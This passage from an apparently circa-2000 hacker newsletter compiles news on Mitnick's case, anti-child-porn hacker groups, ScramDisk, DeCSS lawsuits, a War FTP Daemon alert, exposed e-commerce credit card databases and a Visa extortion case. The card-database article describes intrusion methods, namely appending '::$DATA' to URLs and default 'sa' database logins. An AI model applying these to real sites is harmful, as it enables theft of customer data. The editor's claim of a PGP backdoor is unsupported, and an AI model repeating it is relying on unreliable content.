information haves and have-nots. "We must connect all of our citizens to the Internet," vowed President Clinton last month. He was not referring to Kevin Mitnick. Mitnick, dubbed the "World's Most Notorious Hacker" by Guinness, pleaded guilty on March 26 to seven felonies, and admitted to cracking computers at cellular telephone companies, software manufacturers, ISPs, and universities, as well as illegally downloading proprietary software. Though he's never been accused of trying to make money from his crimes, he's been in and out of trouble for his nonprofit work since he was a teenager. So, the theory goes, keeping Mitnick away from computers will deprive a known recidivist of the instruments of crime and set him on the road to leading a good and law-abiding life. I've heard that theory from prosecutors, judges and my (then) probation officer. They all compare computers to lock picks, narcotics, and guns-- everything but a ubiquitous tool used by a quarter of all Americans and nearly every industry. Mitnick, we should believe, will be tempted in the next year or so to crack some more computers and download some more software. But when the crucial moment comes for him to commit a felony that could land him in prison for a decade, his fingers will linger indecisively over the keyboard as he realizes, "Wait! I can't use a computer! My probation officer will be pissed!" The fact is, if Mitnick chooses crime, he won't be deterred by the 11 months in prison that a technical supervised release violation could carry. These conditions only prevent him from making legitimate use of computers. Mitnick's rehabilitation is up to him. But the system shouldn't throw up obstructions by keeping him away from the mainstream, on the sidelines, and out of the job market. His probation officer will have the power to ease his restrictions, perhaps by allowing him to get a computer job with the informed consent of his employer. That would be a good start. January 21 will be a happy day for Mitnick, his family, and friends. But getting out of prison after a long stretch carries challenges too. Nobody is served by stranding the hacker on the wrong side of the digital divide. ____________________________________________________________________________ Mitnick: 'I was never a malicious person' /* This is news from a few months ago, but still a headline */ Hacker files motion accusing government of misconduct -- goes on the record with ZDNN. 'The federal government manipulated the facts.' Read the online article at: http://www.zdnet.com/zdnn/stories/news/0,4586,2306704,00.html?chkpt=zdnnrla Since this is *big* news, you can stay here and read the ASCII-version: Mitnick: 'I was never a malicious person' Hacker files motion accusing government of misconduct -- goes on the record with ZDNN. 'The federal government manipulated the facts.' By Kevin Poulsen, ZDNet News July 30, 1999 4:36 PM PT Kevin Mitnick and his attorneys are asking a federal judge to unseal a court filing that they claim proves the government was guilty of misconduct while building its case against the hacker. The goal, says Mitnick in a rare interview, is to clear his name. "At the beginning of this case the federal government manipulated the facts to allege losses that were grossly inflated," Mitnick said in a telephone interview Thursday night from the Los Angeles Metropolitan Detention Center. "Hopefully, if the court considers this motion and rules upon its merits, it will clear me publicly of the allegations that I caused these significant losses." The motion, filed by defense attorney Don Randolph on July 22, is the latest conflict in a case that's remained unusually acrimonious, considering that both sides reached a plea settlement in March. Under the terms of the agreement, Mitnick pleaded guilty to seven felonies and admitted to penetrating computers at such companies as Motorola (NYSE:MOT), Fujitsu and Sun Microsystems, (Nasdaq:SUNW) and downloading proprietary source code. On Aug. 9, he's expected to be sentenced to 46 months in prison, on top of the 22 months he received for cell phone cloning and an earlier supervised release violation. Mitnick vexed by 'snowball effect' The only sentencing issue left unresolved is the amount of money Mitnick will owe his victims. Prosecutors are seeking $1.5 million in restitution -- a modest figure compared to the more than $80 million the government quoted to an appeals court last year, when it successfully fought to hold the hacker without bail. That figure, though no longer promulgated by prosecutors, vexes Mitnick, who sees a "snowball effect" of bad press that began with a 1994 front-page article in the New York Times. "Because of this assault that was made upon me by John Markoff of the New York Times, then the federal government grossly exaggerating the losses in the case and the damages I caused, I have a desire to clear my name," Mitnick said. "The truth of the matter is that I was never a malicious person. I admit I was mischievous, but not malicious in any sense." Markoff reported on Mitnick for the New York Times, and went on to co-author Tsutomu Shimomura's book, "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It," slated as an upcoming movie from Miramax. Markoff's portrayal of Mitnick, and the profit it ultimately earned him, has been the subject of some criticism from Mitnick's supporters, and raised eyebrows with a handful of journalists. Markoff's most enduring Mitnick anecdote is the story that the hacker cracked NORAD in the early 1980s, a claim that was recycled as recently as last May by another New York Times reporter. "I never even attempted to access their computer, let alone break into it," Mitnick said. "Nor did I do a host of allegations that he says I'm guilty of." For his part, Markoff says of the NORAD story: "I had a source who was a friend of Kevin's who told me that. I was not the first person to report it, nor the only person to report it." Government collusion? The July 22 motion filed by Mitnick's attorney accuses the government of coaching victim companies on how to artificially inflate their losses. The filing is based on documents Randolph subpoenaed from Sun, which show that shortly after Mitnick's February 1995 arrest, the FBI specifically instructed Sun to calculate its losses as "the value of the source code" Mitnick downloaded, and to keep the figure "realistic." Following the FBI's advice, Sun estimated $80 million in losses based on the amount they paid to license the Unix operating system. Six other companies responded, using software development costs as the primary calculus of loss. The total bill came to $299,927,389.61, significantly more than the $1.5 million the government says Mitnick inflicted in repair and monitoring costs, and theft of services and the $5 million to $10 million both sides stipulated to for purposes of sentencing. "At the beginning of this litigation, the government misrepresented to the federal judiciary, the public and the media the losses that occurred in my case," Mitnick said. To Randolph, it all smacks of collusion. "What comes out from the e-mails that we have, is that the so-called loss figures solicited by the government were research and development costs at best, fantasy at worst," he said. "I would classify it as government manipulation of the evidence." However, prosecutor David Schindler dismissed Randolph's claims as "silly and preposterous." "What would be inappropriate is to tell them what dollar amount to arrive at. In terms of the methodology, in terms of what is to be included in loss amounts, that direction is something we often provide because we're aware of what components are allowable under law, and which components are not," he said. Schindler said development costs are a valid indicator of victim loss, but acknowledges that putting a dollar figure on software can be difficult. Mitnick claims cover-up Mitnick and his attorney both say there's more to the story, but they can't talk about it. At Mitnick's last court appearance on July 12, the judge granted a government request that any filings relating to victim loss be sealed from the public. "As much as the government would like to, you can't take the recipe for ice and file it under seal and have it become confidential," said Mitnick, who, along with his attorney, is challenging the confidentiality of the loss information, and asking for the motion to be unsealed. Mitnick claims he smells a cover-up. "The government should not be permitted to bury the truth of the case from the public and the media by seeking and obtaining a protective order to essentially force me to enter a code of silence," he said. "Our only concern, as it has been from day one, is the protection of the victims of Mitnick's crimes," prosecutor Schindler said. "Why Mitnick and his lawyers want to continue to harass, embarrass and abuse them remains a mystery to us, but it's something that we will continue to oppose vigorously." Although the software costs are no longer being used against his client, Randolph claimed that by "manipulating the loss figures," the government raises the issue of whether even the more modest $1.5 million calculation is accurate. In the sealed motion, he's seeking an evidentiary hearing to explore the matter, and asking that Mitnick be released on a signature bond pending that hearing. And if Mitnick winds up owing money anyway? "We're asking for sanctions that the government pay the restitution," Mitnick said, "and that the judge recommend that I be immediately designated to a halfway house for the government's misconduct in this case." Excerpt of the Sun documents are available on the Free Kevin Web site, maintained by members of a tireless grass-roots movement that's protested the hacker's imprisonment for years. "I'd like to sincerely thank all my friends and supporters for all the support they've given me over this long period of time," Mitnick said. "I'd like to thank them from my heart." Kevin Poulsen writes a weekly column for ZDTV's CyberCrime. @HWA 25.0 Hackers vs Pedophiles, taking on a new approach. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.wired.com/news/print/0,1294,33869,00.html Hackers' New Tack on Kid Porn by Lynn Burke 3:00 a.m. 3.Feb.2000 PST Kent Browne used to spend most of his free time hacking Web sites, erasing hard drives, disabling servers, and knocking folks out of chat rooms. Like many hackers, he subscribed to the classic Machiavellian argument, that the end justifies the means -- especially when the end was eradicating child pornography on the Internet. In early December, he and some fellow hackers from New York to Australia started a group called Condemned, and announced their intention to take down child pornographers by any means necessary. But when Browne, 41, talked to Parry Aftab, an attorney who heads the biggest and most well-known of the anti-child pornography groups -- Cyber Angels -- he had a sudden change of heart. "She said that the one problem we would have would be with law enforcement. If they knew we were doing illegal stuff, they wouldn't touch us with a 10-foot pole," he said. "Quite frankly, I'm an older guy. I've got two kids. And I don't want to take any chances." So now he and the rest of Condemned's loosely organized volunteers use specially designed software and good old-fashioned Internet search engines to ferret out the bad stuff and tip off federal agents in the U.S. Customs Service and the FBI. They're not alone. Natasha Grigori and her volunteer staff at antichildporn.org have also decided to hang up their hacking shoes. At her old organization, Anti Child Porn Militia, Grigori was dedicated to the use of hacking to disable child pornography Web sites. "We started out very angry, we started out very militant," she said. But a trip to Def Con in Las Vegas made her change her mind. She started talking with people on the right side of the law, and they told her they supported her cause, but not her means. "You can't stop a felony with a felony," she says now. But the decision to go "legal" was a difficult one, and she lost most of her volunteer hackers. "Less than a dozen out of 250 stuck with us," she said. "They didn't like the idea. They just thought we could rip and tear." Browne also says he had a hard time leaving the hacking behind, mostly because he thought it was right. "Which is more illegal? Having children's pictures on the Internet or hacking down the servers?" he asked. "Morally, I felt I was right." But morals don't make hacking the right way to eliminate child pornography, according to Aftab, the author of The Parent's Guide to Protecting Your Children in Cyberspace. She says hacking complicates the fight and casts a cloud over groups like hers that work closely with law enforcement. "We need help but we need the right help," she said. When a site is taken down off the Web, it turns up somewhere else, usually within minutes, she said. And if a server is destroyed, so is the evidence of the person behind it. "I'd frankly love to able to do all kinds of things to these groups," she said. "You can't let your gut reaction dictate how you react to a disgusting situation." Getting a gauge on the prevalence of child pornography is difficult. Experts say that most of the images of child pornography are downloaded from newsgroups and traded in secret email clubs. Aftab says true child pornography -- the kind that features children who are very young -- isn't very easy to stumble across on the Web. It takes some digging, she says, for her volunteers to find about 150 new sites each month. And the reason a group like hers is necessary, she says, is that the technological savvy of the law enforcement is lacking. "When the total technology behind the cops is that one guy uses AOL at home, it's kind of hard to do cyber-forensics," she said. Grigori said she recently asked a federal agent to come to her office for a meeting to talk about the problem. "The one fed looked at my computer like it was a toaster," she said. "I asked him for his email address, and he said, 'I don't have a computer.'" The former deputy chief of the Child Exploitation Unit at the Department of Justice, Robert Flores, also says the government isn't doing its part. Flores has had years of experience tracking down child pornographers and pedophiles, both online and off. But he didn't think he could get his job done as a government employee. "I got to the point where I thought I could do more for families and kids outside of the Justice Department," he said. Flores is now the senior counsel for the Fairfax, Virginia-based National Law Center for Children and Families, a legal resource center for child pornography. "One of the things the Justice Department has failed to do is say that the law applies on the Internet, that the Internet is not a lawless place," he said. The laws forbidding child pornography are fairly new. The Supreme Court first ruled in New York v. Ferber in 1982 that child pornography was not protected by the First Amendment. The decision said the government could ban sexual images with serious literary or artistic value in the interest of preventing "the harmful employment of children to make sexually explicit materials for distribution." Two years later, the justices said the government could outlaw not just the distribution but also the possession of child porn. And it is only in the last few years that the Internet has played a role in laws and statutes governing pornography in general, and child pornography in particular. There is currently a schism within the legal community over the definition of child pornography, and whether it should include computer-generated photographs or computer-enhanced photographs that appear to feature children engaged in sex acts, but actually contain adults. But while the courts hammer out the issues, some say citizens shouldn't take matters into their own hands. Flores likened the Internet community's attempt to patrol child pornography to picketers in front of a porn store. It's well-intentioned, but it won't change anything. "My recommendation is that this is not the job for a layman, quite simply," he said. "That's why we pay taxes." @HWA 26.0 SCRAMDISK (Windows) on the fly encryption for your data. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This isn't new, but it is a VERY good package, several of my colleagues and myself use it for sensitive material on our winboxes. The bonus is, its free software and will offer sufficient protection of data for most users. This is especially useful for using personal data on your drives at work and hiding it from the boss, its like having your own (secret) hard disk in your work's machine. The other uses are obvious. A note about PGP, the latest versions have a BACKDOOR that allows federal agencies access to your data. Use an earlier version of PGP (4.2) if you want to make things harder for federal agents to access your data(!) - Ed The walls have ears, the net has taps, the government (not just your own) IS listening and scanning your data, so protect your privacy and use PGP for sensitive emails or data transmissions, also use SSH instead of telnet for accessing your shell accounts if possible as many sites are sniffed by hackers daily. - Ed http://www.securiteam.com/tools/ScramDisk_-_Disk_Encryption_Tool.html 5/1/2000 ScramDisk - Disk Encryption Tool Details Scramdisk is a program that allows the creation and use of virtual encrypted drives. Basically, you create a container file on an existing hard drive that is locked with a specific password. This container can then be mounted by the Scramdisk software, which creates a new drive letter to represent the drive. The virtual drive can then only be accessed with the correct pass phrase. Without the correct pass phrase the files on the virtual drive are totally inaccessible - even physically extracting the data will reveal nothing (since the contents are encrypted). Once the pass phrase has been entered correctly and the drive is mounted, the new virtual drive can be used as a normal drive; files can be saved and retrieved and you can safely install applications onto the encrypted drive. Scramdisk allows virtual disks to be stored in a number of ways: 1. In a container file on a FAT formatted hard disk. 2. On an empty partition. 3. Stored in the low bits of a WAV audio file (this is called steganography). This last option is especially interesting, since this WAV file can be sent by e-mail or carried on a diskette without attracting too much attention (since by casual hearing the WAV file sounds like the original sound file). Details: Scramdisk can create virtual disks with a choice of a number of 'industry standard' encryption algorithms: Triple-DES, IDEA, MISTY1, Blowfish, TEA (either 16 & 32 rounds), and Square. It also includes a proprietary and very fast algorithm 'Summer' which is provided for minimal security applications and for compatibility with older versions of ScramDisk. Why not use PGP? PGP is a great program, but it doesn't allow the on-the-fly encryption of a disk's contents. Instead users have to: 1. Decrypt the existing file 2. Work on the data 3. Re-encrypt the data The problem is, while the file is decrypted it is vulnerable to interception. Scramdisk is complementary to PGP; PGP is excellent for communication security, but is somewhat lacking user friendliness when used for data storage security. Flaws in the system Scramdisk is not totally secure (and nor is any security program!). There are a number of ways an attacker may try infiltrating your system: 1. Look for applications that leak data. A very well known word-processor has an interesting bug that leaks parts of the raw contents of the disk when saving an OLE Compound Document. 2. Look for data that isn't deleted securely. Ok, everyone knows that you can undelete a file easily. Did you know that even a file that has been 'wiped' could potentially be recovered by looking at the surface of the disk? Deleted files should be securely wiped using an appropriate program (PGP v6+ contains a secure file wiping program). 3. Look for data that has leaked in other ways. Temporary files and the swap file spring to mind. These both need to be securely erased too. 4. Using Van Eck monitoring. Basically, electrical emissions from the monitor, hard drive and even keyboard can be detected and recorded from a distance away. This may allow an eavesdropper to see what's on your screen or detect your pass phrase as you type it. 5. Brute Forcing. This can happen in a number of ways: they can try brute-forcing your pass phrase (its important to use a large pass phrase that isn't easily guessed, it helps to use both upper and lower case and numbers as well) or they can try to brute force the algorithm. This is hard work (and will take around 2^127 operations with most of the ciphers included with ScramDisk - DES & Summer are exceptions). 6. Some of the ciphers included may be susceptible to attacks not known about in public. The NSA/GCHQ may have a mechanism faster than brute-force of attacking the algorithms. Scramdisk does not include any weak algorithms in the original distribution (apart from Summer, which is included for backwards compatibility), but who can tell what the Intelligence Agencies can do with Blowfish, IDEA, 3DES et al? 7. Install an amended version of ScramDisk on your computer that secretly stores your pass phrase so that it can be later read by a CIA agent. (Or use a program like SKIn98 to do it!) Far fetched? Possibly, but you should be aware that this kind of attack exists. There is no real way to defend this attack. Check the PGP Signatures of the ScramDisk files against the executables on your computer, but could your copy of PGP have also been amended? 8. Beating you until you spill your pass phrase. Truth drugs also work, apparently. The software can be downloaded free of charge from: http://www.scramdisk.clara.net/ @HWA 27.0 HNN:Jan 17: MPAA files more suits over DeCSS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hackernews.com/arch.html?011700 MPAA Files More Suits over DeCSS contributed by Project Gamma and Macki In an effort to stop further distribution of the DeCSS program the Motion Picture Association of America has filed lawsuits in federal courts. This follows similar action two weeks ago by the DVD industry association. The MPAA feels that allowing potential illegal copying of DVDs with the DeCSS the program would be a violation US copyright law. Wired http://www.wired.com/news/politics/0,1283,33680,00.html ZD Net http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2422893,00.html?chkpt=p1bn CNN has some interesting quotes from a Warner Home Video spokesperson regarding this hole mess. CNN - Look about halfway down http://www.cnn.com/TRANSCRIPTS/0001/11/st.00.html MPAA has a few interesting things to say as well. MPAA http://www.mpaa.org/dvd/content.htm The folks over at CopyLeft have come up with a T-shirt that has the source code to css_descramble.c printed on it. (Cool, and only $15) CopyLeft http://copyleft.net/cgi-bin/copyleft/t039.pl?1&back ** These are really neat, check em out.. - Ed 2600 has posted the story of what has happened to them since their involvement began including them being named as a defendant in the case. 2600.com http://www.2600.com/news/2000/0115.html OpenDVD.org is attempting to cover all the developments (and doing a damn good job) in this case including the scheduled injunction for January 18, 2000. OpenDVD.org http://opendvd.org/ Articles: Wired; Movie Studios File DVD Hack Suit Reuters 5:20 p.m. 14.Jan.2000 PST The seven largest US movie studios filed their own lawsuits Friday to prevent several Internet sites from distributing a program that could allow copying of DVD movies. The lawsuits, filed in federal courts in New York and Connecticut, followed a broader lawsuit filed last month in state court in California by a DVD equipment manufacturers group. At issue is a program called DeCSS, written by a Norwegian programmer, that allows users to bypass the encryption scheme used on DVDs to prevent unauthorized copying. But many Internet users and programmers say the software had a simpler, less insidious goal. They said the program was needed to allow people to watch DVD movies on computers running the Linux operating system. The studios argued that by allowing potential illegal copying, the program violated US copyright law. They asked the courts to prohibit four people from distributing the program on their Web sites. A spokesman for the Motion Picture Association of America, the studios' lobbying group, said the Web sites involved were dvd-copy.com, krackdown.com and ct2600.com. Dozens of other Web sites have also carried either the program or source code instructions showing how to write the program. "This is a case of theft," said Jack Valenti, president of the association. "The posting of the de-encryption formula is no different from making and then distributing unauthorized keys to a department store." The people who posted the code said they had done nothing wrong, insisting that the program was meant to allow viewing of DVD movies under Linux. "I don't have illegal copies of movies on my site," said Shawn Reimerdes, a computer programmer who maintains the dvd-copy.com Web site. "Just posting these files shouldn't be illegal." Internet advocacy groups have also opposed the lawsuits, arguing that the posting of computer codes on a Web site is a form of speech protected by the First Amendment. "This is definitely an infringement on freedom of speech," said Shari Steele, director of legal services at the Electronic Frontier Foundation, a San Francisco -based cyber-rights advocacy group. "What has been done was totally legal. Posting of the program is legal and there are no pirated movies here." Chris DiBona, who promotes Linux use for VA Linux Systems, said the industry had refused to help create a program to play DVDs under Linux. "The whole reason this happened is because the movie industry itself didn't support Linux," DiBona said. "They thought they could keep this a secret. They failed." The lawsuit relied on the 1998 Millennium Digital Copyright Act, which outlawed the distribution of products designed to crack copyright protection schemes. "If you can't protect that which you own, then you don't own anything," MPAA's Valenti said. In the California case, the court last month turned down the industry's request for a temporary restraining order against a much wider array of defendants, many of whom had only provided a link on their Web page to a page containing the actual program. A hearing is scheduled for next week. Friday's lawsuits were filed by Buena Vista Pictures, a unit of Walt Disney, Metro-Goldwyn-Mayer, Paramount Pictures, a unit of Viacom, Sony's Sony Pictures Entertainment, News Corp.'s Twentieth Century Fox Film, Universal Studios, a unit of Seagram, and Warner Bros., a unit of Time Warner. -=- MPAA; 404 - sorry article vanished. @HWA 28.0 WARftpd Security Alert (Will they EVER fix this software??) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://war.jgaa.com/alert/ SECURITY ALERT - WAR FTP DAEMON ALL VERSIONS Updated February 4th 2000 13:30 Central European Time. January 5th 2000, a seriuos security problem with War FTP Daemon 1.70 was reported by email. Two hours after I read the mail, a security alert was sent to the war-ftpd mailing list, the alt.comp.jgaa newsgroup and the bugtraq mailing list. The alert adviced all server operators to take the server off-line until further notice. Brief overview War FTP Daemon 1.70: The bug allows unrestricted access to any file on the local machine also for users that have not logged on. If an older ODBC driver is installed, the bug also gives users unlimited access to all system commands, with administrator privileges (this is a bug in ODBC that has been fixed in recent versions). The advice is to take all version 1.70 servers off-line until the server is upgraded! A bugfix (War FTP Daemon 1.71) was released January 8th 2000 14:40 CET. This version is not completely tested yet. Please report any serious problems to jgaa@jgaa.com. I Will fix bugs in 1.70 over the next few weeks to make 1.70 a little more comfortable to use while we wait for version 3. War FTP Daemon 1.67b2 and previous versions: The bug may give privileged uses unrestricted access to some files. Users must be logged in, and have at least write or create permissions. Users can not execute commands. A bugfix was released less than 24 hours from I read the mail that reported the problem. Buffer overflow problem in 1.6* February 2nd 2000 there was reported a buffer-overflow problem in 1.6 versions on BUGTRAQ. The problem does not seem to compromise the security, but the server can easily be crashed by remote attackers, after they have logged in. A fix was released February 3rd 2000, about an hour after I read about the problem. Bugfixes are released at ftp://ftp.no.jgaa.com and http://war.jgaa.com/alert/files I'm sorry for any inconveniences caused by these problems. General news War FTP Daemon 1.67. I will make a new full distribution for 1.67. Until this is ready, 1.65 must be installed, and then upgraded. War FTP Daemon 1.72 service release. I will make a service release of the 1.70 series in the near future. Some annoying bugs will be fixed, and a command-line utility to add user accounts interactively, or from scripts, will be released. There will also be a simple DLL wrapper interface for easy integration with other software. War FTP Daemon 3.0. The development of the next major release continues. 3.0 is currently running under Windows NT and Linux. The server is however not yet ready for alpha-testing. When all the basic functionality is implemented, and debugged, ftp://ftp.jgaa.com will open up, using version 3.0. This can be expected soon. Early versions for Windows 9x, Windows NT, Debian Linux and FreeBSD will be available for download. Version 3.0 will be Open Source, under the GNU Public License. http://download.jgaa.com will open when War FTP Daemon 3.0 moves into early alpha. Jarle @HWA 29.0 HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by mack MSNBC found seven ecommerce sites open for business with easily accessible customer databases. By connecting to weakly secured SQL databases MSNBC was able to access the personal information including credit card numbers of 2500 people. All of the sites have been informed of the problem. (And people act surprised when I tell them that I don't buy anything on the web.) MSNBC http://www.msnbc.com/news/357305.asp Stealing cards easy as Web browsing By Bob Sullivan MSNBC Jan. 14 — Just how easy is it to steal credit card numbers on the Internet? On Thursday, MSNBC was able to view nearly 2,500 credit card numbers stored by seven small e-commerce Web sites within a few minutes, using elementary instructions provided by a source. In all cases, a list of customers and all their personal information was connected to the Internet and either was not password-protected or the password was viewable directly from the Web site. CREDIT CARD THEFT, a problem long lurking in the background of Internet commerce, leaped to the top of consumers’ minds earlier this month when a computer intruder calling himself Maxus was able to break into CD Universe’s database of user credit cards. There’s still speculation about how he did it. But perhaps Maxus didn’t have to work so hard. This week, MSNBC was able to view nearly 2,500 credit card numbers and other data essentially by browsing e-commerce Web sites using a commercially available database tool rather than a Web browser. Not only were the sites storing the credit cards in plain text in a database connected to the Web — the databases were using the default user name and in some cases, no password. These basic security flaws were found by a legitimate Russian software company named Strategy LLC, according to CEO Anatoliy Prokhorov, and shared with MSNBC. He says he tried contacting some of the companies first and got no response. “From our point of view this is just unprofessionalism in a very high degree that’s not explainable,” Prokhorov said. His company writes software that helps consumers compare prices across multiple e-commerce sites, so his developers become familiar with data structures at hundreds of e-commerce sites. He says they weren’t looking to find security flaws, but rather stumbled on these. “This is just a hole we passed by, an open door. Our people were amazed.” But security experts were not. Given the speed required to succeed in the fast-paced Internet economy, companies are in a big hurry to publish working Web sites and often skimp on security measures. “This is a microcosm of what’s out there,” said Elias Levy of SecurityFocus.com. Levy’s site was the first to report the CD Universe break-in last weekend. “One could only imagine what they would have found if they were looking for problems.... The problem is fairly widespread, and what Anatoliy has found is a small snapshot.” Prokhorov also contacted SecurityFocus.com with his information, and the site today will issue its own report based on its independent investigation. The security flaws Prokhorov found involve more than just easy-to-steal credit cards. At all seven sites, MSNBC was able to view a wide selection of personal data including billing addresses, phone numbers and in some cases, employee Social Security numbers. Prokhorov sent the list and instructions to MSNBC on Tuesday. It included about 20 Web sites which either had no password protection at all on their database servers — in each case, they were running Microsoft’s SQL Server software — or had password information exposed on their Web site. Connecting to all the sites was as simple as starting SQL Server and opening a connection to the Web site. (Note: Microsoft is a partner in MSNBC.) Expressmicro.com, Computerparts.com, Directmicro.com and Sharelogic.net — were all contacted 24 hours before this story so they could close the security hole. While the flaws are obvious, assessing blame is a much more sticky business. There’s a mounting concern that small businesses are particularly vulnerable to attack; many don’t have computer experts on staff. Other times, non-technically savvy business owners take lowball bids from developers who promise a secure Web site but don’t deliver. Then there are inherent problems in software itself that make flaws more likely. In some cases, the server-side code underlying a Web page is viewable if a browser places “::$DATA” at the end of the page’s Web address. That code, normally hidden, can contain any usernames, passwords and other information about any computer connected to that server. This flaw was revealed over two years ago and has since been patched. Four of the vulnerable sites MSNBC found were hosted on the same Web server and had not plugged this hole. But even without knowing that technique, an intruder could have entered the sites anyway — the username required for entering the database was the default “sa,” which stands for “system administrator”; the password was the name of the company. “We used a developer, and obviously the developer didn’t take that flaw into consideration,” said a spokesperson for the sites. “The flaw could have lied within the software, but maybe the developer should have taken that into consideration ... and one thing we didn’t do, we didn’t hire a security company to come in and test our Web site.” Getting a second opinion when building an e-commerce site is a good idea, said security expert Russ Cooper, who maintains the popular NTBugTraq mailing list. “Make a condition of the contract that it has to pass scrutiny of another individual who tests the site,” Cooper recommended. The fundamental problem, he said, is that developers have no liability for flaws they leave behind in e-commerce sites. Merchants are responsible for the cost of any stolen merchandise, while most developer contracts make clear they are not responsible for what happens with a site they build. “So a lot of people end up with a working site but not a secure site.” The other three vulnerable sites MSNBC visited simply used “sa” as the username for their database, and no password. Average consumers have no way of knowing how well-guarded their personal information is when they submit it to a Web site. Levy said the problems MSNBC found at these seven sites are hardly isolated. “The blame falls on more than one person. You can’t rush out to set up an e-commerce site regardless of how much you want to make money. ... Many people don’t give (security) a second thought,” he said. One of the fundamental flaws in all these sites — and, experts say, in many other sites — is the storing of private consumer information in the first place. While encryption techniques that scramble the data are available, it’s often kept on a computer in plain text — one step away from the Internet. While that’s more convenient, experts agree it’s a bad idea. “My advice is, if nothing else, don’t store the data where it physically has access to the Web,” said Wesley Wilhelm, a fraud prevention consultant at the Internet Fraud Prevention Advisory Council. “Take them off every night and make a sneakernet run.” As for consumers, there isn’t much they can do to ascertain how well a Web site is guarding their personal information. Some experts suggest using only one card online, and religiously checking credit card bills. While consumers are liable for at most $50 of fraudulent purchases, they are responsible for catching them and alerting their bank. MSNBC’s Curtis Von Veh contributed to this story. @HWA 30.0 HNN:Jan 17: Scotland Yard Investigating Cyber Ransom Demands ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by tom It is alleged the a team of sophisticated professional electronic intruders have broken into twelve multinational companies and have issued ransom demands to prevent the release of stolen information. This report only names one of the company's in question, Visa, and says that Scotland Yard is investigating. (While it would appear that Visa has admitted to the intrusion we would like know who the other companies are.) The UK Times http://www.the-times.co.uk/news/pages/sti/2000/01/16/stinwenws01028.html?999 January 16 2000 BRITAIN Hacker gang blackmails firms with stolen files Jon Ungoed-Thomas and Stan Arnaud A BRITISH group of hackers has broken into the computer systems of at least 12 multinational companies and stolen confidential files. It has issued ransom demands of up to £10m and is also suspected of hiring out its services. Scotland Yard is now investigating the attacks, which computer experts have described as the most serious systematic breach ever of companies' security in Britain. "The group is using very sophisticated techniques and has been exchanging information via e-mail and internet chat," said an investigator. Visa confirmed last week that it had received a ransom demand last month, believed to have been for £10m. "We were hacked into in mid-July last year," said Russ Yarrow, a company spokesman. "They gained access to some corporate material and we informed both Scotland Yard and the FBI." It is understood the hackers stole computer "source codes" that are critical to programming, and threatened to crash the entire system. If Visa's system crashed for just one day, the company - which handles nearly £1 trillion business a year from customers holding 800m Visa cards - could lose tens of millions of pounds. "We received a phone call and an e-mail to an office in England demanding money," Yarrow said. The company contacted police after the ransom demand. "We hardened the system, we sealed it and they did not return. We have firewalls upon firewalls, but are concerned that anyone got in." Scotland Yard's computer crime unit is now scrutinising e-mail traffic between several known hackers in England and Scotland. Last month officers from the unit flew to Hopeman, a Scottish fishing village, and seized equipment from the home of James Grant, who works for a local computer company. He has been interviewed by detectives and Visa security experts. It is understood that he has given a legal undertaking to Visa not to discuss the matter. "He is saying nothing at all," said his mother, Rhona. "That is a situation that will not change in the future." Grant, 20, studied computing in nearby Elgin, and now works for Data Converters, based in Elgin. His father is a member of the civilian security staff at RAF Lossiemouth air base and his mother a care worker. Detectives are studying attacks on at least 12 companies that they believe have been penetrated by the group and others that may be connected, including one within the Virgin group, in which a hacker tried to break into the UK mailing system. They believe the group may also be acting as paid specialists for information brokers who trade corporate secrets. "These are professionals and there is some evidence that suggests some of the activity was contracted and paid for," said a computer expert involved in the investigation. The group's success has exposed flaws in security. The internet company CD Universe last week confirmed it had called in the FBI after being blackmailed by a hacker who had copied more than 300,000 of its customer credit card files. Scotland Yard said: "There is an ongoing investigation into the incident involving Visa, but it is too early to speculate about the involvement of a group." @HWA 31.0 HNN:Jan 17: Pay Phone Fraud Committed with Drinking Straw ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SUCK THIS! From HNN http://www.hackernews.com/ contributed by deeeek Telstra (Australian Telephone Company) has to upgrade 29,000 payphones due to fraud involving a drinking straw. The problem affects 80% of the pay phones installed since 1997. No information about exactly how the fraud was committed was given. (A Straw? Oh, there must be a text file on this somewhere.) Fairfax IT http://it.fairfax.com.au/breaking/20000114/A24452-2000Jan14.html Scam forces Telstra to fix 29,000 pay phones 9:17 Friday 14 January 2000 AAP TELSTRA is urgently modifying 80 per cent of its public pay phones after a scam was discovered involving a drinking straw and free phone calls around the world. Telstra would have the 29,000 vulnerable phones rectified soon, Telstra's public affairs manager Michael Herskope said yesterday. The Spanish-manufactured coin and phone card-operated Smart pay phone was phased into the Australian network from 1997. The scam potentially cost Telstra millions of dollars in unlimited STD and ISD calls since then, but Telstra can only speculate. "We have a rough idea, but that's not something we're really going to publicise,'' Herskope said. The scam was made public on the front page of Albury-Wodonga's The Border Morning Mail yesterday. The newspaper was told by perpetrators that the low-tech scam had been well known since the phones were introduced as part of a $100 million upgrade of the public phone national network. One source said some people may have learnt about it from the Internet. The paper accompanied a man to three public phones chosen at random and observed him make free calls, including one to New York. Telstra had initially dismissed the scam as a myth, the paper said. But Herskope denied that Teltra only learnt of the fraud from the country newspaper. "We've known about it for a little while,'' he said. "It's pretty hard to articulate weeks, days. I'm not sure how it was brought to our attention but it certainly was.'' He said rectifying the problem was a simple procedure. Without disclosing how the fraud was perpetrated, he said there was no design fault in the phone. "This particular fault will be closed off very shortly,'' he said. @HWA 32.0 Owning sites that run WebSpeed web db software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: win2k security advice mailing list. From: George <georger@NLS.NET> To: <win2ksecadvice@LISTSERV.NTSECURITY.NET> Sent: Friday, February 04, 2000 7:32 PM Subject: Webspeed security issue leaves sites vulnerable I reported this to Progress (maker of Webspeed) a month ago and they said they would 